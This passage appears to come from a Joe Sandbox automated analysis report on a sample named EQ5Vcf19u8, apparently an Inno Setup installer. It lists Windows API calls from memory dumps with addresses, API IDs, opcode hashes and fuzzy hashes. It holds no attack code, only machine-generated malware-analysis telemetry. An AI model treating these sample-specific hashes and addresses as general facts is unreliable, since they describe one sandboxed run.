                                                                                        • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                        APIs
                                                                                        • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value
                                                                                        • String ID: NoModify
                                                                                        • API String ID: 3702945584-1699962838
                                                                                        • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                        • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                        • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                        • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                        APIs
                                                                                        • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                          • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                          • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                          • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                        • SendNotifyMessageA.USER32(00020478,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                        • String ID:
                                                                                        • API String ID: 2649214853-0
                                                                                        • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                        • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                        • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                        • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                          • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMetricsMultiSystemWide
                                                                                        • String ID: /G
                                                                                        • API String ID: 224039744-2088674125
                                                                                        • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                        • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                        • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                        APIs
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                        • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseEnum
                                                                                        • String ID:
                                                                                        • API String ID: 2818636725-0
                                                                                        • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                        • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                        • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2919029540-0
                                                                                        • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                        • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                        • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                        • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindFree
                                                                                        • String ID:
                                                                                        • API String ID: 4097029671-0
                                                                                        • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                        • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                        • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                        • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CurrentEnumWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2396873506-0
                                                                                        • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                        • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                        • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                        APIs
                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastMove
                                                                                        • String ID:
                                                                                        • API String ID: 55378915-0
                                                                                        • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                        • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                        • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                        • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                        • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                        • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorLoad
                                                                                        • String ID:
                                                                                        • API String ID: 3238433803-0
                                                                                        • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                        • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                        • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLibraryLoadMode
                                                                                        • String ID:
                                                                                        • API String ID: 2987862817-0
                                                                                        • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                        • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                        • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                        • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                        APIs
                                                                                        • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                        • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeKnownPathTask
                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                        • API String ID: 969438705-544719455
                                                                                        • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                        • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                        • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                        • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                        • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
                                                                                        • Opcode Fuzzy Hash: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                        • Instruction Fuzzy Hash: 0EE012E93042015BF700EA6599C1B2F22DCDB44315F00446ABD44CA28BE678CC048B29
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 2087232378-0
                                                                                        • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                        • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                        • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                        • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408712), ref: 004085FB
                                                                                          • Part of subcall function 00406DEC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E09
                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1658689577-0
                                                                                        • Opcode ID: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                        • Instruction ID: 9026c6f0acc6bf601755118861b832b1e3c4c92574a9a05948c89544872af2a3
                                                                                        • Opcode Fuzzy Hash: 92125e52594e5bc8ee6d97e09480d95589045c4468e862feaba19903f63d3f1d
                                                                                        • Instruction Fuzzy Hash: 47314E35E00109ABCB00EB55CC819EEB779EF84314F558577E815BB286EB38AA018B98
                                                                                        APIs
                                                                                        • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoScroll
                                                                                        • String ID:
                                                                                        • API String ID: 629608716-0
                                                                                        • Opcode ID: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                        • Instruction ID: 6365c2cd079840e4170b7c9ce409c3d873e807bce8729d2e10e5c00059922083
                                                                                        • Opcode Fuzzy Hash: a0ce2aaa01497ac04468ea6ac7a83421c49688bcbeeff2d3e991700215f3b25f
                                                                                        • Instruction Fuzzy Hash: D8214FB1608746AFC351DF3984407A6BBE4BB48344F14893EE498C3741E778E99ACBD6
                                                                                        APIs
                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                        • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C4AE,?,00000000,?,?,0046C6C0,?,00000000,0046C734), ref: 0046C492
                                                                                          • Part of subcall function 0041EF58: IsWindow.USER32(?), ref: 0041EF66
                                                                                          • Part of subcall function 0041EF58: EnableWindow.USER32(?,00000001), ref: 0041EF75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
